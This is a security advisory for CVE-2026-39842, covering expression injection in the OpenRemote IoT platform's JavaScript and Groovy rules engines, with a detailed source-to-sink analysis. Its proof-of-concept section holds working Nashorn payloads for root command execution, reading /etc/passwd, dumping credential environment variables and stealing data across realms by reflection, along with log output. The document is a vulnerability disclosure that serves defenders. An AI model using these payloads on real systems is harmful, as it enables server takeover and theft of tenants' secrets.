CVE-2026-39842

CRITICAL9.9EPSS 0.08%

Expression Injection in OpenRemote

發布日:2026/4/14修改日:2026/5/5

描述

### Summary The OpenRemote IoT platform's rules engine contains two interrelated critical expression injection vulnerabilities that allow an attacker to execute arbitrary code on the server, ultimately achieving full server compromise. - Unsandboxed Nashorn JavaScript Engine: JavaScript rules are executed via Nashorn's ScriptEngine.eval() with user-supplied script content and no sandboxing, class filtering, or access restrictions. Critically, any non-superuser with the write:rules role can create JavaScript rulesets. - Inactive Groovy Sandbox: The Groovy rules engine has a GroovyDenyAllFilter security filter that is defined but never registered (the registration code is commented out), rendering the SandboxTransformer ineffective. While Groovy rules are restricted to superusers, the absence of sandboxing violates the principle of defense in depth. ### Details #### Attacker-Controllable Source-to-Sink Paths There are two non-superuser and two superuser exploitable attack paths from the REST API entry point to final code execution. (JavaScript × Realm/Asset + Groovy × Realm/Asset) The most critical path is detailed below. Path 1: Unsandboxed JavaScript Expression Injection via Realm Ruleset (Non-Superuser Exploitable) **`RulesetDeployment.java` L368:** ```java Object result = scriptEngine.eval(script, engineScope); ``` The Nashorn JavaScript engine is initialized **without** a `ClassFilter`, allowing `Java.type()` to access any JVM class — including `java.lang.Runtime` (for RCE), `java.io.FileReader` (for file read), and `java.lang.System` (for env theft). **`RulesResourceImpl.java` L309 (and L331, L359, L412, L437):** ```java // VULNERABLE: only restricts Groovy, JavaScript completely unrestricted if (ruleset.getLang() == Ruleset.Lang.GROOVY && !isSuperUser()) { throw new WebApplicationException(Response.Status.FORBIDDEN); } ``` Non-superuser attackers with only the `write:rules` role can submit arbitrary JavaScript rules that execute with full JVM access. ``` ┌─────────────────────────────────────────────────────────────────────────────────────────┐ │ SOURCE → SINK Complete Data Flow │ ├─────────────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ① HTTP REQUEST (Source / Entry Point) │ │ POST /api/{realm}/rules/realm │ │ Content-Type: application/json │ │ Body: { "type":"realm", "lang":"JAVASCRIPT", │ │ "rules":"<MALICIOUS_SCRIPT>", ... } ← Attacker-controlled malicious script │ │ │ │ ↓ JAX-RS Deserialization │ │ │ │ ② RulesResource.createRealmRuleset() │ │ model/.../rules/RulesResource.java:153-158 │ │ @POST @Path("realm") @RolesAllowed("write:rules") │ │ Interface: long createRealmRuleset(RequestParams, @Valid RealmRuleset ruleset) │ │ JSON body → RealmRuleset object (Jackson deserialization) │ │ RealmRuleset.rules field ← attacker's malicious script content │ │ RealmRuleset.lang field ← "JAVASCRIPT" │ │ │ │ ↓ Calls implementation │ │ │ │ ③ RulesResourceImpl.createRealmRuleset() ← ⚠️ Authorization flaw here │ │ manager/.../rules/RulesResourceImpl.java:250-267 │ │ - L255: isRealmActiveAndAccessible(realm) — checks realm accessible ✓ │ │ - L255: isRestrictedUser() — restricted users blocked ✓ │ │ - L262: if (ruleset.getLang() == Ruleset.Lang.GROOVY && !isSuperUser()) │ │ → Only blocks GROOVY for non-superusers ✓ │ │ - ⚠️ NO check for Lang.JAVASCRIPT! JavaScript rules pass through unrestricted ⚠️ │ │ - L265: ruleset = rulesetStorageService.merge(ruleset) │ │ → Passes the RealmRuleset (with malicious script) to persistence layer │ │ │ │ ↓ JPA Persistence │ │ │ │ ④ RulesetStorageService.merge() │ │ manager/.../rules/RulesetStorageService.java:155-159 │ │ - L157: entityManager.merge(ruleset) │ │ → Persists RealmRuleset entity (with rules and lang fields) to REALM_RULESET table│ │ - After JPA transaction commit, Hibernate event listener is triggered │ │ │ │ ↓ Hibernate Event → Camel Message │ │ │ │ ⑤ Hibernate Interceptor → PersistenceService Event Publishing │ │ container/.../persistence/PersistenceEventInterceptor.java:51-62, 102-119 │ │ - L55-56: new PersistenceEvent<>(CREATE, entity, propertyNames, state) │ │ → Hibernate Interceptor captures the JPA entity persist event │ │ - L102-119: afterTransactionBegin() registers Synchronization callback; │ │ afterCompletion() calls eventConsumer.accept(persistenceEvent) (L114) │ │ container/.../persistence/PersistenceService.java:596-607 │ │ - PersistenceService implements Consumer<PersistenceEvent<?>> (L84) │ │ - L596-606: accept() publishes event to Camel SEDA topic: │ │ producerTemplate.withBody(persistenceEvent) │ │ .withHeader(HEADER_ENTITY_TYPE, entity.getClass()) │ │ .to(PERSISTENCE_TOPIC).asyncSend() │ │ - PERSISTENCE_TOPIC = "seda://PersistenceTopic?multipleConsumers=true&..." │ │ (PersistenceService.java:209-210) │ │ │ │ ↓ Camel Route Consumption │ │ │ │ ⑥ RulesService.configure() — Camel Route Processor │ │ manager/.../rules/RulesService.java:228-235 │ │ - L228: from(PERSISTENCE_TOPIC) │ │ - L230: .filter(isPersistenceEventForEntityType(Ruleset.class)) │ │ → Filters for Ruleset-type events only │ │ - L232-234: .process(exchange -> { │ │ PersistenceEvent<?> pe = exchange.getIn().getBody(PersistenceEvent.class); │ │ processRulesetChange((Ruleset) pe.getEntity(), pe.getCause()); │ │ }) │ │ → Extracts RealmRuleset entity from event and dispatches to change handler │ │ │ │ ↓ │ │ │ │ ⑦ RulesService.processRulesetChange() │ │ manager/.../rules/RulesService.java:503-531 │ │ - L504: cause == CREATE (not DELETE), ruleset.isEnabled() == true │ │ → Enters the deployment branch (else block) │ │ - L518: ruleset instanceof RealmRuleset → takes realm branch │ │ - L520: RulesEngine<RealmRuleset> engine = │ │ deployRealmRuleset((RealmRuleset) ruleset) │ │ - L521: engine.start() │ │ │ │ ↓ │ │ │ │ ⑧ RulesService.deployRealmRuleset() │ │ manager/.../rules/RulesService.java:589-625 │ │ - L591: Gets existing engine from realmEngines Map or creates new one │ │ - L594-613: If new engine: new RulesEngine<>(...), stores in realmEngines │ │ - (via addRuleset): engine.addRuleset(ruleset) │ │ → Passes RealmRuleset to engine for deployment │ │ │ │ ↓ │ │ │ │ ⑨ RulesEngine.addRuleset() │ │ manager/.../rules/RulesEngine.java:252-273 │ │ - L264: deployment = new RulesetDeployment(ruleset, this, timerService, │ │ assetStorageService, executorService, scheduledExecutorService, │ │ assetsFacade, usersFacade, notificationFacade, webhooksFacade, │ │ alarmsFacade, historicFacade, predictedFacade) │ │ → Creates deployment object wrapping the Ruleset (with malicious script) │ │ - L265: deployment.init() │ │ → Triggers compilation and initialization │ │ │ │ ↓ │ │ │ │ ⑩ RulesetDeployment.init() │ │ manager/.../rules/RulesetDeployment.java:132-158 │ │ - L143: TextUtil.isNullOrEmpty(ruleset.getRules()) → false, script is non-empty │ │ - L149: ruleset.isEnabled() → true │ │ - L154: if (!compile()) → calls compile() │ │ │ │ ↓ │ │ │ │ ⑪ RulesetDeployment.compile() │ │ manager/.../rules/RulesetDeployment.java:211-228 │ │ - L217: switch (ruleset.getLang()) { │ │ - L218: case JAVASCRIPT: ← lang field is JAVASCRIPT │ │ - L219: return compileRulesJavascript(ruleset, assetsFacade, │ │ usersFacade, notificationsFacade, historicDatapointsFacade, │ │ predictedDatapointsFacade); │ │ │ │ ↓ │ │ │ │ ⑫ RulesetDeployment.compileRulesJavascript() ← SINK (Code Execution Point) │ │ manager/.../rules/RulesetDeployment.java:306-378 │ │ │ │ - L307: // TODO https://github.com/pfisterer/scripting-sandbox/... │ │ ↑ Sandbox was NEVER implemented (only a TODO comment) │ │ │ │ - L308: ScriptEngine scriptEngine = │ │ scriptEngineManager.getEngineByName("nashorn"); │ │ ↑ Uses Nashorn 15.7 (gradle.properties:59) │ │ ↑ Obtained via ScriptEngineManager — NO ClassFilter applied │ │ ↑ Attacker can access ANY Java class via Java.type() │ │ │ │ - L309-311: Creates ScriptContext and Bindings │ │ - L312-317: Binds internal service objects to engineScope: │ │ "LOG" → Logger, "assets" → Assets facade, │ │ "users" → Users facade, "notifications" → Notifications facade │ │ │ │ - L319: String script = ruleset.getRules(); │ │ ↑↑↑ DIRECTLY reads the attacker's malicious script content ↑↑↑ │ │ ↑↑↑ This is the exact same value from the HTTP Body "rules" field ↑↑↑ │ │ ↑↑↑ passed through step ① with NO sanitization whatsoever ↑↑↑ │ │ │ │ - L322-365: Auto-prepends Java interop prefix: │ │ load("nashorn:mozilla_compat.js") → provides importPackage() │ │ importPackage("java.util.stream", ...) → auto-imports Java packages │ │ var Match = Java.type("...AssetQuery$Match") → pre-registers Java.type() │ │ ... (12 active Java.type references; 1 commented out) │ │ ↑ These prefixes further lower the attack barrier │ │ │ │ - L365: + script; │ │ ↑ Attacker script appended directly (string concatenation, no checks) │ │ │ │ - L368: scriptEngine.eval(script, engineScope); │ │ ↑↑↑ !!! FINAL SINK — The script string containing attacker's │ │ ↑↑↑ malicious code is DIRECTLY EXECUTED by Nashorn ScriptEngine │ │ ↑↑↑ Attacker uses Java.type('java.lang.Runtime') etc. to invoke │ │ ↑↑↑ arbitrary Java class methods, achieving Remote Code Execution (RCE) │ │ │ └─────────────────────────────────────────────────────────────────────────────────────────┘ ``` Path 2: JavaScript Expression Injection via Asset Ruleset (Non-Superuser Exploitable) Same data flow as Path 1. Differences only in the first three steps: | Step | Difference | |------|-----------| | ① Source | `POST /api/{realm}/rules/asset`, body includes `"assetId":"xxx"` | | ② Entry | `RulesResource.createAssetRuleset()` — `RulesResource.java:200-206` | | ③ Auth Flaw | `RulesResourceImpl.createAssetRuleset()` — `RulesResourceImpl.java:341-365`: L350 checks realm accessible, L353 checks restricted user's asset link, L359 only blocks `GROOVY`, **`JAVASCRIPT` unrestricted**. L363 `rulesetStorageService.merge(ruleset)` | #### Sink Code Analysis Sink 1: `compileRulesJavascript()` — Lines 306-378 ```java // RulesetDeployment.java L306-378 protected boolean compileRulesJavascript(Ruleset ruleset, ...) { // L307: TODO indicates sandbox was NEVER implemented // L308: Gets Nashorn engine via ScriptEngineManager — NO ClassFilter ScriptEngine scriptEngine = scriptEngineManager.getEngineByName("nashorn"); // L312-317: Binds internal service objects engineScope.put("LOG", LOG); engineScope.put("assets", assetsFacade); // L319: DIRECTLY reads attacker's script content String script = ruleset.getRules(); // L322-365: Prepends Java interop imports (lowers attack barrier) script = "load(\"nashorn:mozilla_compat.js\");\n" + ... + script; // L368: SINK — Executes the malicious script! scriptEngine.eval(script, engineScope); } ``` Why missing ClassFilter is fatal: The Nashorn engine provides a ClassFilter interface to restrict which Java classes scripts can access. The current code uses scriptEngineManager.getEngineByName("nashorn") (L308) which applies no ClassFilter, so the attacker can access any Java class via Java.type(). Sink 2: `compileRulesGroovy()` — Lines 449-485 ```java // RulesetDeployment.java L449-485 protected boolean compileRulesGroovy(Ruleset ruleset, ...) { // L451-452: Sandbox code COMMENTED OUT // TODO Implement sandbox // new DenyAll().register(); ← COMMENTED OUT! // L453: Parses attacker's Groovy script Script script = groovyShell.parse(ruleset.getRules()); // L473: SINK — Directly executes Groovy script script.run(); } ``` Why SandboxTransformer is ineffective: The GroovyShell uses SandboxTransformer (L79-81) for AST transformation, but this transformer relies on registered GroovyInterceptor instances at runtime. Since new DenyAll().register() is commented out (L452), no interceptor is registered, making SandboxTransformer a no-op. ### Path 3: Groovy Expression Injection via Realm Ruleset (Superuser Only) ``` ┌─────────────────────────────────────────────────────────────────────────────────────────┐ │ SOURCE → SINK Complete Data Flow (Groovy) │ ├─────────────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ① HTTP POST /api/{realm}/rules/realm │ │ Body: { "type":"realm", "lang":"GROOVY", │ │ "rules":"<MALICIOUS_GROOVY>", ... } │ │ Requires superuser privileges │ │ │ │ ② RulesResource.createRealmRuleset() — RulesResource.java:153-158 │ │ │ │ ③ RulesResourceImpl.createRealmRuleset() — RulesResourceImpl.java:250-267 │ │ - L262: if (lang == GROOVY && !isSuperUser()) → superuser passes ✓ │ │ - L265: rulesetStorageService.merge(ruleset) │ │ │ │ ④-⑩ Same as Path 1 steps ④-⑩ │ │ │ │ ⑪ RulesetDeployment.compile() — RulesetDeployment.java:211-228 │ │ - L220: case GROOVY → compileRulesGroovy(ruleset, ...) │ │ │ │ ⑫ RulesetDeployment.compileRulesGroovy() ← SINK │ │ manager/.../rules/RulesetDeployment.java:449-485 │ │ - L451: // TODO Implement sandbox ← Sandbox NEVER implemented │ │ - L452: // new DenyAll().register() ← Security filter COMMENTED OUT! │ │ - L453: Script script = groovyShell.parse(ruleset.getRules()) │ │ ↑ groovyShell uses SandboxTransformer (L79-81) │ │ ↑ But no GroovyInterceptor registered → SandboxTransformer is ineffective │ │ ↑ ruleset.getRules() directly reads attacker's malicious Groovy script │ │ - L454-462: Creates Binding, binds internal service objects │ │ - L472: script.setBinding(binding) │ │ - L473: script.run() │ │ ↑↑↑ FINAL SINK — Groovy script executed directly, no sandbox ↑↑↑ │ │ │ └─────────────────────────────────────────────────────────────────────────────────────────┘ ``` ### Path 4: Groovy Expression Injection via Asset Ruleset (Superuser Only) Same as Path 3; first three steps differ as in Path 2. ### PoC #### Test Environment | Component | Details | |-----------|---------| | Host OS | macOS Darwin 25.1.0 | | Docker | Docker Compose with official OpenRemote images | | OpenRemote | `openremote/manager:latest` (v1.20.2) | | Keycloak | `openremote/keycloak:latest` | | PostgreSQL | `openremote/postgresql:latest-slim` | | Target URL | `https://localhost` | #### Multi-Tenant Test Topology ``` ┌─────────────────────────────────────────────────────────┐ │ OpenRemote Platform │ │ │ │ ┌─────────────────┐ ┌─────────────────┐ │ │ │ Realm A │ │ Realm B │ │ │ │ (Attacker) │ │ (Victim) │ │ │ │ │ │ │ │ │ │ User: attacker │ ──X──│ SecretSensorB │ │ │ │ Roles: │ API │ secretData │ │ │ │ write:rules │blocked│ apiKey │ │ │ │ read:assets │ │ password │ │ │ │ NOT superuser │ │ │ │ │ └─────────────────┘ └─────────────────┘ │ │ │ │ API isolation: Realm A user CANNOT access Realm B │ │ via normal REST API (HTTP 401) │ │ │ │ Exploit: Realm A user creates JavaScript rule that │ │ executes arbitrary code on the SERVER, bypassing all │ │ tenant isolation │ └─────────────────────────────────────────────────────────┘ ``` #### Deployment OpenRemote was started using the project's official `docker-compose.yml`: ``` cd /path/to/openremote-openremote docker compose up -d ``` Containers running: <img width="1430" height="136" alt="截屏2026-03-27 14 50 10" src="https://github.com/user-attachments/assets/8291181b-56a3-4fc6-a7d3-77ab276b6d6c" /> #### Reproduction Steps & Evidence ##### Step 0: Obtain Admin Tokens ``` KC admin-cli token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6IC... [OK] Direct access grants for 'master': HTTP 204 OR admin token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6IC... API health check: HTTP 200, version=1.20.2 ``` ##### Step 1: Setup Multi-Tenant Environment Created Realm B (victim) with sensitive assets, and Realm A (attacker) with a non-superuser. ``` Create realm 'realmb': HTTP 409 (already exists from prior run — OK) [OK] Direct access grants for 'realmb': HTTP 204 Create victim asset in realmb: HTTP 200, ID=4cddi4ncR9w7RHRbVzVZfq Planted sensitive data in Realm B: secretData = 'REALM_B_CONFIDENTIAL_DATA_67890' apiKey = 'sk-realmB-api-key-very-secret' internalPassword = 'P@ssw0rd_Internal_2024' Create realm 'realma': HTTP 409 [OK] Direct access grants for 'realma': HTTP 204 [OK] User 'attacker' in 'realma', ID: 0d137364-b538-45d2-b3b3-33f57d97b9f5 [OK] Roles assigned: ['read:rules', 'write:assets', 'read:assets', 'write:rules'] ``` Key point: The attacker user has write:rules role but is NOT a superuser. ##### Step 2: Verify Tenant Isolation Works via Normal API ``` Attacker token: eyJhbGciOiJSUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6IC... [TEST] Normal API: GET /api/realmb/asset (attacker token) Result: HTTP 401 >> Cross-realm API access BLOCKED (expected) — tenant isolation works via API ``` Conclusion: The REST API correctly blocks Realm A users from accessing Realm B assets. The vulnerability is NOT in the API layer but in the rules engine execution. ##### Step 3: Launch the attack. - ATTACK 1 — Remote Code Execution (RCE) Payload sent (via POST /api/realma/rules/realm with attacker token): ``` var Runtime = Java.type("java.lang.Runtime"); var Scanner = Java.type("java.util.Scanner"); var cmd = Java.to(["sh", "-c", "id && hostname && uname -a"], "java.lang.String[]"); var proc = Runtime.getRuntime().exec(cmd); proc.waitFor(); var s = new Scanner(proc.getInputStream()).useDelimiter("\\A"); var output = s.hasNext() ? s.next() : "(empty)"; LOG.info("[EXPLOIT-RCE] Command output: " + output); var rules = []; ``` API response: HTTP 200 (rule accepted and deployed) Server log evidence (captured from docker compose logs manager): ``` 2026-03-27T07:17:24.833Z [EXPLOIT-RCE] === REMOTE CODE EXECUTION === 2026-03-27T07:17:24.838Z [EXPLOIT-RCE] --- RCE OUTPUT --- 2026-03-27T07:17:24.838Z [EXPLOIT-RCE] uid=0(root) gid=0(root) groups=0(root) ``` Impact: The attacker's JavaScript rule executed id on the server and confirmed the process runs as root (uid=0). The attacker can execute any OS command with root privileges. - ATTACK 2 — Arbitrary File Read (/etc/passwd) Payload: ``` var Files = Java.type("java.nio.file.Files"); var Paths = Java.type("java.nio.file.Paths"); var lines = Files.readAllLines(Paths.get("/etc/passwd")); LOG.info("[EXPLOIT-FILE] /etc/passwd has " + lines.size() + " lines:"); for (var i = 0; i < lines.size(); i++) { LOG.info("[EXPLOIT-FILE] " + lines.get(i)); } var rules = []; ``` API response: HTTP 200 Server log evidence: - ATTACK 3 — Environment Variable Theft (Database Credentials) **Payload:** ```javascript var System = Java.type("java.lang.System"); var env = System.getenv(); LOG.info("[EXPLOIT-ENV] === ENVIRONMENT VARIABLE THEFT ==="); var keys = ["OR_DB_HOST","OR_DB_PORT","OR_DB_NAME","OR_DB_USER","OR_DB_PASSWORD", "KEYCLOAK_ADMIN_PASSWORD","OR_ADMIN_PASSWORD","OR_HOSTNAME","JAVA_HOME"]; for (var i = 0; i < keys.length; i++) { var v = env.get(keys[i]); if (v != null) LOG.info("[EXPLOIT-ENV] " + keys[i] + " = " + v); } var rules = []; ``` **API response**: `HTTP 200` **Server log evidence** (key variables extracted): ``` 2026-03-27T07:17:45.069Z [EXPLOIT-ENV] OR_DB_HOST = postgresql 2026-03-27T07:17:45.069Z [EXPLOIT-ENV] OR_DB_PORT = 5432 2026-03-27T07:17:45.069Z [EXPLOIT-ENV] OR_DB_NAME = openremote 2026-03-27T07:17:45.070Z [EXPLOIT-ENV] OR_DB_USER = postgres 2026-03-27T07:17:45.070Z [EXPLOIT-ENV] OR_HOSTNAME = localhost 2026-03-27T07:17:45.070Z [EXPLOIT-ENV] JAVA_HOME = /usr/lib/jvm/jre 2026-03-27T07:17:45.087Z [EXPLOIT-ENV] OR_KEYCLOAK_HOST = keycloak 2026-03-27T07:17:45.087Z [EXPLOIT-ENV] OR_KEYCLOAK_PORT = 8080 2026-03-27T07:17:45.087Z [EXPLOIT-ENV] OR_STORAGE_DIR = /storage 2026-03-27T07:17:45.087Z [EXPLOIT-ENV] OR_WEBSERVER_LISTEN_HOST = 0.0.0.0 2026-03-27T07:17:45.088Z [EXPLOIT-ENV] OR_DB_POOL_MAX_SIZE = 20 2026-03-27T07:17:45.088Z [EXPLOIT-ENV] OR_DEV_MODE = false 2026-03-27T07:17:45.086Z [EXPLOIT-ENV] OR_FIREBASE_CONFIG_FILE = /deployment/manager/fcm.json 2026-03-27T07:17:45.086Z [EXPLOIT-ENV] OR_EMAIL_PORT = 587 ``` **Impact**: Database connection details, internal hostnames, Keycloak configuration, and more are fully exposed. An attacker could use these to directly connect to the PostgreSQL database or attack other internal services. --- - ATTACK 4 — Cross-Realm Data Theft (Bypass Multi-Tenant Isolation) This is the most critical attack: a user in Realm A steals all data from Realm B by bypassing the `AssetsFacade` realm enforcement via Java reflection. **Attack mechanism:** 1. The `assets` object bound into JavaScript is an `AssetsFacade` instance 2. `AssetsFacade.getResults()` enforces realm isolation by overwriting `assetQuery.realm` 3. The attacker uses Java reflection to extract the internal `assetStorageService` field 4. Calls `assetStorageService.findAll()` directly, bypassing realm restriction AND `excludeAttributes()` **Payload:** ```javascript // Extract internal AssetStorageService via reflection var facadeObj = assets; var clazz = facadeObj.getClass(); var storageField = clazz.getDeclaredField("assetStorageService"); storageField.setAccessible(true); var storageService = storageField.get(facadeObj); // Query Realm B directly — bypassing facade realm enforcement var AssetQuery = Java.type("org.openremote.model.query.AssetQuery"); var RealmPredicate = Java.type("org.openremote.model.query.filter.RealmPredicate"); var q = new AssetQuery(); q.realm = new RealmPredicate("realmb"); var stolenAssets = storageService.findAll(q); // Iterate and dump all attribute values... var rules = []; ``` **API response**: `HTTP 200` **Server log evidence — Stolen data from Realm B:** ``` 2026-03-27T07:17:55.151Z [EXPLOIT-XREALM] === CROSS-REALM DATA THEFT === 2026-03-27T07:17:55.151Z [EXPLOIT-XREALM] Attacker realm: realma 2026-03-27T07:17:55.151Z [EXPLOIT-XREALM] Target realm: realmb 2026-03-27T07:17:55.162Z [EXPLOIT-XREALM] Facade class: org.openremote.manager.rules.facade.AssetsFacade 2026-03-27T07:17:55.190Z [EXPLOIT-XREALM] Got AssetStorageService: org.openremote.manager.asset.AssetStorageService 2026-03-27T07:17:55.199Z [EXPLOIT-XREALM] Found 2 assets in realm 'realmb' 2026-03-27T07:17:55.207Z [EXPLOIT-XREALM] STOLEN Asset: name=SecretSensorB, id=3eZKswGIALiGAqeEPdnH3t, type=ThingAsset 2026-03-27T07:17:55.228Z [EXPLOIT-XREALM] STOLEN ATTR: notes = Internal sensor - classified 2026-03-27T07:17:55.229Z [EXPLOIT-XREALM] STOLEN ATTR: apiKey = sk-realmB-api-key-very-secret 2026-03-27T07:17:55.230Z [EXPLOIT-XREALM] STOLEN ATTR: location = GeoJSONPoint{coordinates=5.46, 51.44, NaN} 2026-03-27T07:17:55.230Z [EXPLOIT-XREALM] STOLEN ATTR: internalPassword = P@ssw0rd_Internal_2024 2026-03-27T07:17:55.230Z [EXPLOIT-XREALM] STOLEN ATTR: secretData = REALM_B_CONFIDENTIAL_DATA_67890 ``` **Cross-realm enumeration — all assets across all realms:** ``` 2026-03-27T07:17:55.236Z [EXPLOIT-XREALM] Total assets across ALL realms: 5 2026-03-27T07:17:55.236Z [EXPLOIT-XREALM] ALL-REALM Asset: realm=master, name=TestAsset, id=5pVko8DN... 2026-03-27T07:17:55.236Z [EXPLOIT-XREALM] ALL-REALM Asset: realm=master, name=TestAsset, id=4zfyoaiL... 2026-03-27T07:17:55.236Z [EXPLOIT-XREALM] ALL-REALM Asset: realm=master, name=TestMasterAsset, id=3vqFI9kI... 2026-03-27T07:17:55.237Z [EXPLOIT-XREALM] ALL-REALM Asset: realm=realmb, name=SecretSensorB, id=3eZKswGI... 2026-03-27T07:17:55.237Z [EXPLOIT-XREALM] ALL-REALM Asset: realm=realmb, name=SecretSensorB, id=4cddi4nc... ``` **Impact**: Complete multi-tenant isolation bypass. Realm A's non-superuser successfully: - Extracted all sensitive attribute values from Realm B (API keys, passwords, confidential data) - Enumerated all assets across ALL realms including the `master` realm - Bypassed both the realm restriction AND the `excludeAttributes()` protection in `AssetsFacade` --- - Authorization Bypass Verification The same attacker user attempted to create a Groovy rule (which is correctly restricted to superusers): ``` Create Groovy rule (same attacker): HTTP 403 >> Groovy rule REJECTED (HTTP 403) — as expected for non-superuser >> BUT all JavaScript rules were ACCEPTED (HTTP 200) — THIS IS THE VULNERABILITY! ``` **Root cause in source code** (`RulesResourceImpl.java:262`): ```java // Only blocks Groovy for non-superusers — JavaScript is UNRESTRICTED if (ruleset.getLang() == Ruleset.Lang.GROOVY && !isSuperUser()) { throw new ForbiddenException("Forbidden"); } // No check for Lang.JAVASCRIPT! ``` ### Impact Remote code execution.

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1CRITICAL9.9CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

參考連結(4)